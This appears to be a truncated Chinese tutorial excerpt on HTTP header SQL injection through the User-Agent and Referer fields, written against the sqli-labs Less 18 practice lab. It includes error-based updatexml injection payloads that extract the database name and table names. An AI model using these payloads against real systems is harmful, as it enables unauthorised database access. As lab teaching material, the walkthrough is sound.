16、HTTP頭注入(User-Agent、Referer)

時間 2020-12-31

標籤 HTTP頭頭注入 User-Agent Referer 欄目 HTTP/TCP 简体版

原文原文鏈接

環境sqli-labs less 18 1、在UA處輸入特殊字符，報錯 2、構造輸入語句，獲取數據庫名稱 or updatexml(1,concat(’##’,(database())),0))# 3、獲取表名 or updatexml(1,concat(’##’,(select group_concat(table_name) from information_schema.tables w

>>阅读原文<<